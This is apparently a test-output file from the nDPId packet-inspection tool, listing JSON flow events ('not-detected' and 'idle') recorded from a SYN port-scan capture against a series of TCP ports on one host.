-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1846,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1297,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":691,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":700,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1005,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":705,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060355,"flow_last_seen":1278275060355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060456,"flow_last_seen":1278275060456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":711,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":714,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":720,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1403,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":726,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":726,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 